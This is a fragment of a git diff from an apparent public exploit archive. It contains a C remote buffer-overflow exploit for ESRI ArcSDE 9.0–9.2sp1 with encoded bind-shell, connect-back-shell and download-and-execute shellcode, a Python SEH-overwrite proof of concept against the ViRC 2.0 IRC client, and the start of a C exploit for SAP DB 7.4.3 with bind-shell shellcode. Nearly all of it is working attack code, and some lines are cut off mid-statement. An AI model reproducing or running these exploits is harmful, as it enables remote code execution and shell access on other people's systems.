+		"\x58\x66\x72\x4D\x49\x6D\x4A\x51\x4A\x56\x72\x55\x33\x62\x32\x50"
+		"\x6E\x55\x4A\x51\x4F\x4E\x77\x75\x42\x63\x79\x49\x63\x4D\x4D\x39"
+		"\x50\x32\x51\x4B\x79\x4D\x49\x6D\x49\x6E\x79\x76\x7A\x51\x4F\x4C"
+		"\x54\x68\x4B\x78\x4F\x71\x76\x6A\x6E\x55\x35\x59\x53\x77\x62\x53"
+		"\x71\x4B\x43\x4E\x78\x39\x50\x31\x61\x59\x34\x4D\x49\x4C\x59\x6E"
+		"\x79\x46\x7A\x71\x4F\x6F\x7A\x6A\x6F\x69\x4F\x74\x59\x4D\x77\x77"
+		"\x69\x78\x6C\x73\x53\x37\x69\x6E\x4F\x37\x69\x7A\x67\x75\x4A\x73"
+		"\x45\x6E\x59\x75\x42\x71\x55\x6B\x43\x78\x39\x4B\x7A\x45\x36\x68"
+		"\x4E\x73\x45\x31\x4E\x6D\x4D\x4F\x6A\x39\x55\x79\x68\x6E\x57\x4B"
+		"\x4C\x51\x4E\x6B\x6D\x4F\x6A\x4D\x4D\x38\x61\x79\x6C\x6C\x59\x6A"
+		"\x39\x4F\x5A\x70\x59\x4B\x79\x79\x59\x6A\x6A\x4A\x6F\x39\x59\x73"
+		"\x56\x48\x4E\x53\x55\x55\x42\x71\x55\x6B\x79\x6A\x6A\x50\x66\x48"
+		"\x4E\x65\x39\x6A\x69\x65\x36\x78\x4E\x50\x6D\x6F\x5A\x52\x79\x30"
+		"\x35\x35\x4C\x50\x59\x4A\x4C\x31\x70\x58\x48\x78\x4B\x78\x4F\x6A"
+		"\x6A\x52\x46\x50\x4B\x68\x43\x6B\x70\x74\x72\x73\x4B\x70\x77\x4F"
+		"\x5A\x56\x39\x73\x6A\x61\x61\x4D\x6F\x63\x56\x43\x56\x75\x36\x4B"
+		"\x6E\x79\x6C\x7A\x4D\x6F\x39\x78\x6B\x58\x76\x6B\x4A\x78\x58\x4B"
+		"\x4D\x6B\x4D\x5A\x4B\x4B\x4C\x4A\x4A\x7A\x4A\x5A\x39\x59\x4E\x6B"
+		"\x4C\x48\x6D\x5A\x6A\x6B\x50\x4B\x5A\x5A\x4D\x4B\x4C\x4B\x44\x6B"
+		"\x6D\x6C\x30\x4A\x4B\x6B\x4C\x79\x6A\x58\x6D\x59\x66\x5A\x4B\x59"
+		"\x70\x68\x58\x4D\x49\x7A\x6E\x6A\x50\x4C\x37\x4B\x6C\x6D\x31\x6B"
+		"\x4C\x6B\x4A\x6C\x59\x4B\x6C\x6B\x51\x5A\x50\x48\x6D\x4A\x6D\x68"
+		"\x71\x4A\x4B\x79\x6C\x59\x68\x6B\x4D\x4F\x69\x6E\x35\x4B\x46\x6B"
+		"\x48\x4B\x4D\x4E\x35\x78\x70\x6B\x4B\x4A\x4B\x7A\x58\x48\x6B\x4B"
+		"\x50\x4A\x78\x4C\x59\x4A\x4C\x4A\x4B\x6A\x55\x59\x64\x4C\x36\x6B"
+		"\x47\x4E\x79\x68\x4C\x38\x4B\x7A\x75\x4B\x6D\x79\x66\x7A\x4E\x4B"
+		"\x47\x39\x65\x4A\x56\x58\x78\x4B\x4D\x7A\x6D\x4C\x36\x59\x4F\x78"
+		"\x70\x7A\x55\x39\x6C\x6E\x38\x6D\x49"
+	 },
+	{NULL , NULL }
+};
+
+
+
+int main(int argc, char **argv)
+{
+	char * remotehost=NULL, * cbip=NULL, *url=NULL;
+	char default_remotehost[]="127.0.0.1";
+	char default_cbip[]="127.0.0.1";
+	char temp1[100], temp2[100];
+	int cbport, port, itarget, sh;
+	char ss[100];
+	SOCKET s;
+	char c;	
+	int option_index=0;
+	logo();
+	WSADATA wsa;
+	WSAStartup(MAKEWORD(2,0), &wsa);
+	if(argc<2)
+	{
+		usage(argv[0]);		
+		return -1;
+	}
+
+	// set defaults
+	cbport=4444;
+	port=5151;
+	itarget=-1;
+	sh=0;
+	// ------------	
+	
+	while((c = getopt(argc, argv, "h:p:s:t:I:P:u:"))!= EOF)
+	{
+		switch (c)
+		{
+			case 'h':
+				remotehost=optarg;
+				break; 	
+			case 's':
+				sscanf(optarg, "%d", &sh);
+				sh--;
+				break;
+			case 't':
+				sscanf(optarg, "%d", &itarget);
+				itarget--;
+				break;
+			case 'p':
+				sscanf(optarg, "%d", &port);
+				break;
+			case 'P':
+				sscanf(optarg, "%d", &cbport);
+				break;
+			case 'I':				
+				cbip=optarg;
+				break; 
+			case 'u':				
+				url=optarg;
+				break; 
+			default:
+	            usage(argv[0]);
+				WSACleanup();
+			return -1;
+		}		
+	}	
+	if(remotehost == NULL) remotehost=default_remotehost;
+	if(cbip       == NULL) cbip=default_cbip;
+	if(url        == NULL) url="";
+	memset(temp1,0,sizeof(temp1));
+	memset(temp2,0,sizeof(temp2));
+	memset(temp1, '\x20' , 58 - strlen(remotehost) -1);	
+	printf(" #  Host    : %s%s# \n", remotehost, temp1);	
+	sprintf(temp2, "%d", port);
+	memset(temp1,0,sizeof(temp1));
+	memset(temp1, '\x20' , 58 - strlen(temp2) -1);
+	printf(" #  Port    : %s%s# \n", temp2, temp1);
+	memset(temp1,0,sizeof(temp1));	
+	memset(temp2,0,sizeof(temp2));
+	sprintf(temp2, "%s", shellcodes[sh].name );
+	memset(temp1, '\x20' , 58 - strlen(temp2) -1);	
+	printf(" #  Payload : %s%s# \n", temp2, temp1);	
+	if(itarget!=-1)
+	{
+		memset(temp1,0,sizeof(temp1));	
+		memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1);	
+		printf(" #  Target  : %s%s# \n", targets[itarget].t, temp1);		
+	}else
+	{
+		memset(temp1,0,sizeof(temp1));	
+		memset(temp1, '\x20' , 58 - strlen("Please select target") -1);	
+		printf(" #  Target  : %s%s# \n", "Please select target", temp1);
+	}
+	if(sh==1)
+	{
+		memset(temp1,0,sizeof(temp1));	
+		memset(temp1, '\x20' , 58 - strlen(cbip) -1);	
+		printf(" #  CB IP   : %s%s# \n", cbip, temp1);
+		sprintf(temp2, "%d", cbport);
+		memset(temp1,0,sizeof(temp1));
+		memset(temp1, '\x20' , 58 - strlen(temp2) -1);
+		printf(" #  CB port : %s%s# \n", temp2, temp1);
+	}
+	printf(" # ------------------------------------------------------------------- # \n");
+	fflush(stdout);
+	printf("   [+] Checking if server is online\n");
+	fflush(stdout);
+	s=do_connect(remotehost, port);   
+	if(s==-1)
+	{
+		printf("   [-] Server is OFFLINE\n");
+		end_logo();
+		return 0;
+	}
+	closesocket(s);
+	printf("   [+] Server is ONLINE\n");
+
+	if(itarget==-1)
+	{
+		itarget = get_version(remotehost, port);
+		if(itarget>=0)
+		{
+			printf("   [+] Target: %s%\n", targets[itarget].t);
+		}else
+		{
+			printf("   [-] Please select target\n");
+			WSACleanup();
+			end_logo();
+			return -1;			
+		}		
+	}
+	
+	unsigned char buf[10000];
+	unsigned int len;
+	memset(buf,0,sizeof(buf));
+	fflush(stdout);
+	make_buffer(buf, &len, itarget, sh, cbip, cbport, url);
+
+	printf("   [+] Attacking buffer constructed\n");
+
+	if(send_buffer(buf, len, remotehost,port)==-1)
+	{
+		printf("   [-] Cannot exploit server %s\n", remotehost);
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+
+	printf("   [+] Buffer sent\n");
+
+	if(sh==0)sprintf(ss, "   [+] Connect to %s:%d\n", remotehost, 4444);
+	if(sh==1)sprintf(ss, "   [+] The shell should arrive at %s:%d\n", cbip, cbport);
+	if(sh==2)sprintf(ss, "   [+] File is downloaded and executred\n");
+	printf("%s", ss);
+	end_logo();
+	WSACleanup();
+	return 0;
+}
+
+
+
+SOCKET do_connect (char *remotehost, int port)
+{
+   static struct hostent *host;
+   static struct sockaddr_in addr;
+   SOCKET s;	
+       host = gethostbyname(remotehost);
+       if (!host)
+       {
+           perror("[-] gethostbyname() failed");
+           return -1;
+       }
+       addr.sin_addr = *(struct in_addr*)host->h_addr;
+
+   s = socket(PF_INET, SOCK_STREAM, 0);
+   if (s == -1)
+   {
+       closesocket(s);
+       perror("socket() failed");
+       return -1;
+   }
+
+   addr.sin_port = htons(port);
+   addr.sin_family = AF_INET;
+
+	if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
+   {
+       closesocket(s);     
+       return -1;
+   }
+	
+
+   return s;
+}
+
+SOCKET do_connect_async (char *remotehost, int port)
+{
+   static struct hostent *host;
+   static struct sockaddr_in addr;
+   SOCKET s;	
+       host = gethostbyname(remotehost);
+       if (!host)
+       {
+           perror("[-] gethostbyname() failed");
+           return -1;
+       }
+       addr.sin_addr = *(struct in_addr*)host->h_addr;
+
+   s = socket(PF_INET, SOCK_STREAM, 0);
+   if (s == -1)
+   {
+       closesocket(s);
+       perror("socket() failed");
+       return -1;
+   }
+
+
+    unsigned long l = 1;
+    if ( ioctlsocket( s, FIONBIO, &l ) != 0 )
+    {
+		fprintf( stderr, "Failed setting socket to non-blocking mode\n" );
+		closesocket( s );
+		return -1;
+    }
+
+
+   addr.sin_port = htons(port);
+   addr.sin_family = AF_INET;   
+
+   if ( connect( s, (sockaddr*) &addr, sizeof( sockaddr ) ) == SOCKET_ERROR )
+    {
+		int error = WSAGetLastError( );
+		if ( ( error != WSAEWOULDBLOCK ) && ( error != WSAEINPROGRESS ) )
+		{
+			fprintf( stderr, "Failed connecting to remote host, %d\n", error );
+			closesocket( s );
+			return -1;
+		}
+    }
+
+   return s;
+}
+
+
+
+
+
+
+// get arcsde version to determine target
+int get_version(char * remotehost, int port)
+{
+		// ----------------------------------------
+    	// removed due to publicity of the exploit
+		// ----------------------------------------
+	return -1;
+}
+
+
+
+
+
+
+void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh, char * cbip, int cbport, char *url)
+{
+	memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
+	*fshlength = shellcodes[sh].length;
+	if(sh==1)
+	{			
+		static struct hostent *host = gethostbyname(cbip);
+		static struct sockaddr_in addr;
+		addr.sin_addr = *(struct in_addr*)host->h_addr;		
+		fsh[111] = (addr.sin_addr.S_un.S_un_b.s_b1) ^ 0xc2;
+		fsh[112] = (addr.sin_addr.S_un.S_un_b.s_b2) ^ 0xc2;
+		fsh[113] = (addr.sin_addr.S_un.S_un_b.s_b3) ^ 0xc2;
+		fsh[114] = (addr.sin_addr.S_un.S_un_b.s_b4) ^ 0xc2;
+        
+		fsh[118] = ((cbport >> 8) & 0xff) ^ 0xc2;
+		fsh[119] = ((cbport     ) & 0xff) ^ 0xc2;
+	}
+	if(sh==2)
+	{
+		char locurl[1000];
+		memset(locurl,0,sizeof(locurl));
+		memcpy(locurl, url, strlen(url));
+		locurl[strlen(locurl)]='\x80';
+		char encoded_url[2500] ;
+		alphanumeric_encoder_thx_to_skylined(locurl, encoded_url);
+		strcat((char *)fsh, encoded_url);	
+		*fshlength += (unsigned int)strlen(encoded_url);
+	}
+}
+
+void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh, char * cbip, int cbport, char * url)
+{
+	// prepare shellcode
+	unsigned char fsh[10000];	
+	unsigned int fshlength;
+	memset(fsh, 0, sizeof(fsh));	
+	prepare_shellcode(fsh, &fshlength, sh, cbip, cbport, url);
+	// -----------------
+
+	// make buffer
+	unsigned char * cp=buf;		
+		
+		// long buffer
+	*cp++='\x80';
+	memset(cp, '\x41', 515);
+	cp+=515;	
+
+		//replace EIP
+	*cp++ = (char)((targets[itarget].ret      ) & 0xff);
+	*cp++ = (char)((targets[itarget].ret >>  8) & 0xff);
+	*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
+	*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);	
+
+		// jff
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+    *cp++ = '\x90';
+
+		// copy shellcode
+	memcpy(cp, fsh, fshlength);
+	cp+=fshlength;
+    	
+		// set the length manually cause of the 0x00 bytes 
+	*len = (unsigned int)(cp-buf);
+	// -----------------
+}
+
+
+
+int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port)
+{	
+	SOCKET sock;
+	char str[1000];
+	int bytes;
+	char bufmax[4096];
+
+	sock = do_connect_async(remotehost, port);
+	if(sock==-1)
+	{
+		printf("   [-] Failed to connect to server\n");
+	}	
+	fd_set  fdConnect  = { 0 };
+
+	TIMEVAL stTime;
+	TIMEVAL *pstTime = NULL;
+	long dwTimeout=5000;
+	if (INFINITE != dwTimeout) 
+	{
+	    stTime.tv_sec = dwTimeout / 1000;
+	    stTime.tv_usec = dwTimeout % 1000;
+	    pstTime = &stTime;
+	}
+	if (!FD_ISSET(sock, &fdConnect))
+	FD_SET(sock, &fdConnect);
+
+	int res = select(NULL, NULL, &fdConnect, NULL, pstTime);
+    if(res==0)
+	{
+		closesocket(sock);
+		return -1;
+	}
+	if(res<0)
+	{
+		closesocket(sock);
+		return -1;
+	}
+
+	bytes = send(sock, (char *)buf, len, 0);
+	Sleep(500);
+	printf("   [+] Sent %d bytes to server\n", bytes);
+	
+	fd_set  active_set, read_set;
+
+	FD_ZERO(&active_set);
+    FD_SET(sock, &active_set);
+
+	read_set = active_set;
+    res = select(FD_SETSIZE,&read_set,NULL,NULL, pstTime);
+
+	if (res==0)
+	{
+		closesocket(sock);
+		return 1;
+	}
+
+	if ( res<0 ) {
+    	closesocket(sock);
+		return -1;
+    }
+
+    for (int i=0; i> 4;
+    B = (input & 0x0f);
+    F = B;
+    i = rand() % ((int)strlen(valid_chars));
+    while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); }
+    E = valid_chars[i] >> 4;
+    D = (A^E);
+    i = rand() % ((int)strlen(valid_chars));
+    while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); }
+    C = valid_chars[i] >> 4;
+    sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F);
+    encoded[strlen(encoded)]=temp[0];
+	encoded[strlen(encoded)]=temp[1];
+  }
+  encoded[strlen(encoded)]='A';
+  return 0;
+}
+
+
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring)
+{
+	static char *next = NULL;
+	if (optind == 0)
+		next = NULL;
+
+	optarg = NULL;
+
+	if (next == NULL || *next == '\0')
+	{
+		if (optind == 0)
+			optind++;
+
+		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
+		{
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		if (strcmp(argv[optind], "--") == 0)
+		{
+			optind++;
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		next = argv[optind];
+		next++;		// skip past -
+		optind++;
+	}
+
+	char c = *next++;
+	char *cp = strchr(optstring, c);
+
+	if (cp == NULL || c == ':')
+		return '?';
+
+	cp++;
+	if (*cp == ':')
+	{
+		if (*next != '\0')
+		{
+			optarg = next;
+			next = NULL;
+		}
+		else if (optind < argc)
+		{
+			optarg = argv[optind];
+			optind++;
+		}
+		else
+		{
+			return '?';
+		}
+	}
+
+	return c;
+}
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+void usage(char * s)
+{	
+	printf("   Usage : %s -h  -p  -s  -t  -I  -P  -u \n", s);
+	printf("   Arguments:\n");
+	printf("      -h      host to connect\n");
+	printf("      -p      port (default: 5151)\n");
+	printf("      -s   select shellcode (default: 1)\n");
+	printf("      -t    target to attack\n");
+	printf("      -I        reverse IP for the connect-back shellcode\n");
+	printf("      -P      reverse port for the connect-back shellcode\n");
+	printf("      -u       url for executable for DAX shellcode\n\n");
+	printf("    Shellcodes:\n");
+	for(int i=0; shellcodes[i].name!=0;i++)
+	{
+		printf("       %d. %s\n",i+1,shellcodes[i].name);				
+	}	
+	printf("\n");
+	printf("    Targets:\n");
+	for(int j=0; targets[j].t!=0;j++)
+	{
+		printf("       %d. %s\n",j+1,targets[j].t);
+	}		
+	printf("\n");
+	end_logo();	
+}
+
+void logo()
+{
+	printf("\n\n");
+	printf(" ####################################################################### \n");	
+	printf(" #     ____                 __  _                  ______  __    _____ #\n");
+	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
+	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
+	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
+	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
+	printf(" #                                 crew                                #\n");
+	printf(" ####################################################################### \n");	
+	printf(" #  Exploit : ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow          # \n");
+	printf(" #  Solution: ESRI ArcSDE 9.2 sp2 is invulnerable                      # \n");
+	printf(" #  Author  : Heretic2 (heretic2x@gmail.com                            # \n");
+	printf(" #  THANKS  : iDefense, Zero-tolerance, Metasploit project and anghell # \n");
+	printf(" #  Research: iDefense                                                 # \n");
+	printf(" #  Version : 1.0 Public Release                                       # \n");
+	printf(" #  System  : Windows ALL                                              # \n");
+	printf(" #  Date    : 26.06.2007                                               # \n");
+	printf(" # ------------------------------------------------------------------- # \n");
+}
+
+void end_logo()
+{
+	printf(" # ------------------------------------------------------------------- # \n");
+	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
+	printf(" ####################################################################### \n\n");
+}
+
+// milw0rm.com [2007-07-03]
diff --git a/platforms/windows/remote/4152.py b/platforms/windows/remote/4152.py
index 352c9900b..6e5c36188 100755
--- a/platforms/windows/remote/4152.py
+++ b/platforms/windows/remote/4152.py
@@ -1,145 +1,145 @@
-#!/usr/bin/python
-# ViRC 2.0 'JOIN Response' 0day Remote SEH Overwrite PoC Exploit
-# Bug discovered by Krystian Kloskowski (h07) 
-# Tested on Visual IRC 2.0 / 2k SP4 Polish
-# Shellcode type: Windows Execute Command (calc.exe)
-# How stuff works ? ..
-#
-# [ViRC] -----> (..JOIN..) -------------> [exploit_tunnel] -----------------------------> [Real IRC server]
-# [ViRC] <--- (#channel :AAAAAAA...) <--- [exploit_tunnel] <---- (#channel :nick) <------ [Real IRC server]
-#
-# Details:
-# "#channel :" + "A" * 4116
-# 0x41414141  Pointer to next SEH record
-# 0x41414141  SE handler
-##
-
-from thread import start_new_thread
-from struct import pack
-from string import find
-from string import join
-from socket import *
-
-LEN_RECV = 65536
-
-in_addr = '0.0.0.0'        # local address
-in_port = 6667             # local port
-out_addr = '192.168.0.2'   # address of IRC server
-out_port = 6667            # port of IRC server
-
-shellcode = (
-"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
-"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
-"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
-"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
-"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
-"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
-"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
-"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
-"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
-"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
-"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")
-
-NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06
-SE_HANDLER = 0x7CEA41D3       # POP POP RET (SHELL32.DLL / 2k SP4 Polish)
-
-buf = "A" * 4108
-buf += pack("
+# Tested on Visual IRC 2.0 / 2k SP4 Polish
+# Shellcode type: Windows Execute Command (calc.exe)
+# How stuff works ? ..
+#
+# [ViRC] -----> (..JOIN..) -------------> [exploit_tunnel] -----------------------------> [Real IRC server]
+# [ViRC] <--- (#channel :AAAAAAA...) <--- [exploit_tunnel] <---- (#channel :nick) <------ [Real IRC server]
+#
+# Details:
+# "#channel :" + "A" * 4116
+# 0x41414141  Pointer to next SEH record
+# 0x41414141  SE handler
+##
+
+from thread import start_new_thread
+from struct import pack
+from string import find
+from string import join
+from socket import *
+
+LEN_RECV = 65536
+
+in_addr = '0.0.0.0'        # local address
+in_port = 6667             # local port
+out_addr = '192.168.0.2'   # address of IRC server
+out_port = 6667            # port of IRC server
+
+shellcode = (
+"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
+"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
+"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
+"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
+"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
+"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
+"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
+"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
+"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
+"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
+"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")
+
+NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06
+SE_HANDLER = 0x7CEA41D3       # POP POP RET (SHELL32.DLL / 2k SP4 Polish)
+
+buf = "A" * 4108
+buf += pack("
-#include 
-#include 
-#include 
-#include 
-#pragma comment(lib,"ws2_32")
-
-
-void usage(char * s);
-void logo();
-void end_logo();
-void prepare_shellcode(unsigned char * fsh, int sh);
-void make_buffer(unsigned char * buf, int itarget, int sh);
-int send_buffer(unsigned char * buf, char * remotehost, int port);
-SOCKET do_connect (char *remotehost, int port);
-int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded );
-
-static long timeout = 2000 ; // 2 sec
-
-
-// -----------------------------------------------------------------
-// XGetopt.cpp  Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring);
-char	*optarg;		// global argument pointer
-int		optind = 0, opterr; 	// global argv index
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-
-struct _target{
-	const char *t ;
-	unsigned long ret ;
-} targets[]=
-	{
-		{"UNIVERSAL: SAP DB 7.4.3 [WAPI.dll]",          0x1003a218 },// call ebx
-		{"Windows 2000 Pro SP4 RUSSIAN [kernel32.dll]", 0x793a4a66 },// jmp ebx
-		{"Windows 2000 Pro SP4 ENGLISH [kernel32.dll]", 0x7c4e4a66 },// jmp ebx
-		{"Debug / DoS",                                 0x42424242 },
-		{NULL,                                          0x00000000 }
-	};
-
-
-struct {
-	const char * name;
-	int length;
-	char * shellcode;	
-}shellcodes[]={ 	
-	 {"Bindshell, port 4444   [ args: none ]", 696, 
-		 /* win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
-		"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49"
-		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
-		"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32"
-		"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62"
-		"\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71"
-		"\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c"
-		"\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47"
-		"\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35"
-		"\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c"
-		"\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a"
-		"\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a"
-		"\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64"
-		"\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34"
-		"\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50"
-		"\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64"
-		"\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31"
-		"\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69"
-		"\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30"
-		"\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78"
-		"\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f"
-		"\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73"
-		"\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e"
-		"\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62"
-		"\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71"
-		"\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65"
-		"\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32"
-		"\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e"
-		"\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69"
-		"\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79"
-		"\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d"
-		"\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49"
-		"\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70"
-		"\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45"
-		"\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36"
-		"\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32"
-		"\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e"
-		"\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50"
-		"\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32"
-		"\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a"
-		"\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48"
-		"\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30"
-		"\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39"
-		"\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b"
-		"\x4f\x6a\x76\x6b\x4f\x78\x50\x42"		
-	 },	 
-	{NULL , NULL }
-};
-
-
-
-int main(int argc, char **argv)
-{
-	char * remotehost=NULL;
-	char default_remotehost[]="127.0.0.1";
-	char temp1[100], temp2[100];
-	int port, itarget, sh;
-	SOCKET s;
-	char c;	
-	int option_index=0;
-	logo();
-	WSADATA wsa;
-	WSAStartup(MAKEWORD(2,0), &wsa);
-	if(argc<2)
-	{
-		usage(argv[0]);		
-		return -1;
-	}
-
-	// set defaults
-	port=9999;
-	itarget=-1;
-	sh=0;
-	// ------------	
-	
-	while((c = getopt(argc, argv, "h:p:t:"))!= EOF)
-	{
-		switch (c)
-		{
-			case 'h':
-				remotehost=optarg;
-				break; 	
-			case 't':
